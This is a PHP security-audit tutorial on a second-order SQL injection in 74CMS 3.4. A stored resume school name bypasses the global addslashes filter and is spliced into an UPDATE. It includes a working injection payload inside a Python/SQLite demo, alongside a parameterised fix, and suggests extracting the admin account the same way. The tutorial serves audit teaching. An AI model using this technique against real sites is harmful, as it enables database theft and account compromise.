"PHP Code Audit Example Tutorial" SQL Injection 4: Global Protection Bypass via Second-Order Injection

Source: Internet
Author: User

0x01 Background

Most web applications today have some global filter against SQL injection: for example PHP with magic_quotes_gpc enabled, or a global include such as common.php that runs addslashes() over every received parameter, escaping single quotes in particular. Second-order injection is also fairly common; it involves two steps, storing data into the database and reading it back out. Because of the global escaping, the value is escaped when it is stored:

    INSERT INTO table (username) VALUES ('hack\'');

MySQL consumes the backslash when it parses the string literal, so the stored value is hack' with no escape character left. If hack' is later read out of the database and concatenated into another query, it carries its single quote with it, and that is enough to cause injection.

The vulnerability comes from WooYun:

http://www.wooyun.org/bugs/wooyun-2014-068362

0x02 Environment Setup

For this walkthrough we use an older version of the 74CMS program, version 3.4 (20140310).

① The source can be found online; I packed a copy: Http://pan.baidu.com/s/1c1mLCru

② Extract it into the www directory as 74cms (20140310), open Http://localhost/74cms (20140310)) in the browser and follow the installer step by step. If you hit problems during installation, search Baidu or Google. After a successful install it looks like this:

0x03 Vulnerability Analysis

Part 1: Source Structure

The source layout is clear, probably the clearest structure you will audit, and consists mainly of the following three parts:

index.php includes the common.inc.php file. Following common.inc.php, we find the code that handles GPC input:

    if (!empty($_GET)) { $_GET = addslashes_deep($_GET); }
    if (!empty($_POST)) { $_POST = addslashes_deep($_POST); }
    $_COOKIE = addslashes_deep($_COOKIE);
    $_REQUEST = addslashes_deep($_REQUEST);

As you can see, the server runs addslashes over the GET, POST, COOKIE and REQUEST variables. Anything that does not arrive through those superglobals, such as a value read back from the database, is never touched by this filter.

Part 2: Audit Process

1. First, in the code that saves a personal resume:

    elseif ($act == 'make4_save') {
        $resume_education = get_resume_education($_SESSION['uid'], $_REQUEST['pid']);
        if (count($resume_education) >= 6) showmsg('Educational experience cannot exceed 6!', 1, $link);
        $setsqlarr['uid'] = intval($_SESSION['uid']);
        $setsqlarr['pid'] = intval($_REQUEST['pid']);
        if ($setsqlarr['uid'] == 0 || $setsqlarr['pid'] == 0) showmsg('Parameter error!', 1);
        $setsqlarr['start'] = trim($_POST['start']) ? $_POST['start'] : showmsg('Please fill in the start time!', 1, $link);
        $setsqlarr['endtime'] = trim($_POST['endtime']) ? $_POST['endtime'] : showmsg('Please fill in the end time!', 1, $link);
        $setsqlarr['school'] = trim($_POST['school']) ? $_POST['school'] : showmsg('Please fill in the school name!', 1, $link);
        $setsqlarr['speciality'] = trim($_POST['speciality']) ? $_POST['speciality'] : showmsg('Please fill in the major!', 1, $link);
        $setsqlarr['education'] = trim($_POST['education']) ? $_POST['education'] : showmsg('Please choose a degree!', 1, $link);
        $setsqlarr['education_cn'] = trim($_POST['education_cn']) ? $_POST['education_cn'] : showmsg('Please choose a degree!', 1, $link);
        // Here the education-related fields are INSERTed into the "qs_resume_education" table
        if (inserttable(table('resume_education'), $setsqlarr)) {
            check_resume($_SESSION['uid'], intval($_REQUEST['pid']));
            // ... (rest of the branch not shown in the original)

2. Here we see the INSERT that stores the record. We can try adding a single quote to one of the fields; once the row is stored, the escape character is gone. Let's continue by following the check_resume function that runs after inserttable succeeds.

    // Check how complete the resume is
    function check_resume($uid, $pid) {
        global $db, $timestamp, $_cfg;
        $uid = intval($uid);
        $pid = intval($pid);
        $percent = 0;
        $resume_basic = get_resume_basic($uid, $pid);
        $resume_intention = $resume_basic['intention_jobs'];
        $resume_specialty = $resume_basic['specialty'];
        // Fetch the education experience: this reads the stored data back out of the database
        $resume_education = get_resume_education($uid, $pid);
        if (!empty($resume_basic)) $percent = $percent + 15;
        if (!empty($resume_intention)) $percent = $percent + 15;
        if (!empty($resume_specialty)) $percent = $percent + 15;
        if (!empty($resume_education)) $percent = $percent + 15;
        if ($resume_basic['photo_img'] && $resume_basic['photo_audit'] == "1" && $resume_basic['photo_display'] == "1") {
            $setsqlarr['photo'] = 1;
        } else {
            $setsqlarr['photo'] = 0;
        }
        if ($percent < 60) {
            $setsqlarr['complete_percent'] = $percent;
            $setsqlarr['complete'] = 2;
        } else {
            $resume_work = get_resume_work($uid, $pid);
            $resume_training = get_resume_training($uid, $pid);
            $resume_photo = $resume_basic['photo_img'];
            if (!empty($resume_work)) $percent = $percent + 13;
            if (!empty($resume_training)) $percent = $percent + 13;
            if (!empty($resume_photo)) $percent = $percent + 14;
            $setsqlarr['complete'] = 1;
            $setsqlarr['complete_percent'] = $percent;
            require_once(QISHI_ROOT_PATH . 'include/splitword.class.php');
            $sp = new Spword();
            $setsqlarr['key'] = $resume_basic['intention_jobs'] . $resume_basic['recentjobs'] . $resume_basic['specialty'];
            $setsqlarr['key'] = "{$resume_basic['fullname']}" . $sp->extracttag($setsqlarr['key']);
            $setsqlarr['key'] = str_replace(",", "", $resume_basic['intention_jobs']) . " {$setsqlarr['key']} {$resume_basic['education_cn']}";
            $setsqlarr['key'] = $sp->pad($setsqlarr['key']);
            if (!empty($resume_education)) {
                // Walk every education record and splice its fields into the keyword string
                foreach ($resume_education as $li) {
                    $setsqlarr['key'] = "{$li['school']} {$setsqlarr['key']} {$li['speciality']}";
                }
            }
            $setsqlarr['refreshtime'] = $timestamp;
        }
        // The UPDATE below carries the school name read back from the database
        // without any escaping: this is where the second-order injection fires
        updatetable(table('resume'), $setsqlarr, "uid='{$uid}' and id='{$pid}'");
        updatetable(table('resume_tmp'), $setsqlarr, "uid='{$uid}' and id='{$pid}'");
    }

3. Fill out a resume as a simple test; in the education experience section, enter AA' as the school name.

After saving, the page shows a SQL error from the broken UPDATE statement:

0x04 Vulnerability Proof

Now construct a PoC that retrieves information about the database user:

Viewing the resume, the resume name field now shows root@localhost:

Checking the SQL statement confirms that the UPDATE executed successfully:

Interested readers can go on to extract other fields in the same way, such as the admin account.
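The whole chain above, from the global filter through the INSERT, the read-back and the concatenated UPDATE, can be reproduced offline. The following is an added example written for this page, not code from 74CMS or from the original post. It uses Python with an in-memory SQLite database and a cut-down resume schema; the table and column names, the check functions, the payload string, and the use of sqlite_version() in place of MySQL's user() are all assumptions made for the demonstration. One substitution is worth noting: SQLite does not accept backslash escapes in string literals, so the stand-in for addslashes_deep doubles the quote instead. The mechanism is unchanged, the database strips the escaping and stores the raw quote, and the second query trusts the stored value.

```python
import sqlite3


def global_filter(value: str) -> str:
    """Stand-in for 74CMS's global addslashes_deep() filter (assumption).

    MySQL accepts backslash escapes, so the real code uses addslashes()
    (' becomes \\'). SQLite only accepts the SQL-standard doubled quote, so
    this demo doubles quotes instead. Either way the database un-escapes
    the literal and stores the raw value, which is all that matters here.
    """
    return value.replace("'", "''")


def new_db() -> sqlite3.Connection:
    # Constructed, cut-down schema: a resume row plus its education rows.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE resume (uid INTEGER, id INTEGER, fullname TEXT, key TEXT, refreshtime TEXT);
        CREATE TABLE resume_education (uid INTEGER, pid INTEGER, school TEXT, speciality TEXT);
        INSERT INTO resume VALUES (1, 2, 'alice', '', '0');
    """)
    return db


def make4_save(db, uid, pid, school, speciality):
    # Stage 1 (storage), mirroring make4_save: the POST fields have already
    # passed through the global filter, so this string-built INSERT is
    # syntactically safe. The database strips the escaping and stores the raw
    # value, quote included.
    sql = ("INSERT INTO resume_education (uid, pid, school, speciality) VALUES "
           f"({int(uid)}, {int(pid)}, '{global_filter(school)}', '{global_filter(speciality)}')")
    db.execute(sql)


def build_key(db, uid, pid) -> str:
    # Mirrors the foreach in check_resume: every education row read back from
    # the database is spliced into the keyword string.
    key = ""
    for school, speciality in db.execute(
            "SELECT school, speciality FROM resume_education WHERE uid=? AND pid=?", (uid, pid)):
        key = f"{school} {key} {speciality}"
    return key


def check_resume_vulnerable(db, uid, pid) -> str:
    # Stage 2 (retrieval). The value came from the database, not from the
    # request, so the global filter never touched it; concatenating it into
    # the UPDATE is the second-order injection. Returns the SQL actually run.
    key = build_key(db, uid, pid)
    sql = f"UPDATE resume SET key='{key}' WHERE uid='{int(uid)}' AND id='{int(pid)}'"
    db.execute(sql)
    return sql


def check_resume_fixed(db, uid, pid) -> None:
    # Hardened form: bind the value at the point of use instead of relying on
    # what the input layer did earlier. The payload is stored as plain text.
    key = build_key(db, uid, pid)
    db.execute("UPDATE resume SET key=? WHERE uid=? AND id=?", (key, int(uid), int(pid)))


def run(check):
    """Store a malicious school name, run the given check_resume, return (fullname, key)."""
    db = new_db()
    # Constructed payload: closes the key literal and adds a SET assignment that
    # copies a database expression into a column the victim page displays.
    # sqlite_version() stands in for MySQL's user(), which the original PoC
    # read back as root@localhost. The trailing quote re-opens a literal so the
    # remainder of the generated UPDATE stays syntactically valid.
    payload = "AA', fullname=(SELECT sqlite_version()), refreshtime='"
    make4_save(db, 1, 2, payload, "CS")
    check(db, 1, 2)
    return db.execute("SELECT fullname, key FROM resume WHERE uid=1 AND id=2").fetchone()


def db_version() -> str:
    return sqlite3.sqlite_version


if __name__ == "__main__":
    print("vulnerable:", run(check_resume_vulnerable))  # fullname now holds the version string
    print("fixed:     ", run(check_resume_fixed))       # fullname untouched, key holds the payload
```

Running it shows the two outcomes side by side: with the concatenated UPDATE the resume's fullname column is overwritten with the database expression's result, exactly as the resume name showed root@localhost in the original PoC; with the bound parameters the payload simply ends up as the literal keyword text. The practical lesson for an audit is that a global input filter only protects the first query a value reaches; every later query that re-uses stored data has to escape or bind at its own point of use.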

Original address:

http://www.cnbraid.com/2016/02/19/sql3/
